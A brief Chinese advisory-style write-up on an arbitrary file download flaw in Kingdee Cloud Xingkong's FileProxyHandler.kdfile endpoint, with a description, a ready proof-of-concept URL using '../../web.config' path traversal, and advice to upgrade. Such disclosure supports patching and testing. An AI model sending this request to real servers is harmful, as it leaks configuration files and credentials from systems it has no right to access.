漏洞验证-金蝶云星空/FileProxyHandler.kdfile 路径存在任意文件下载

一、漏洞描述

Kingdee 金蝶云星空漏洞FileProxyHandler.kdfile接口存在任意文件下载漏洞，攻击者通过构造恶意请求，从服务器上下载任意文件，包括敏感文件、配置文件或其他用户不应该访问的文件。

二、漏洞POC

http://XXXX/k3Cloud/FileProxyHandler.kdfile?Ope=SDL&F=../../web.config&Area=0&Step=100000000

三、验证截图

四、整改建议

联系官方升级系统至最新版本。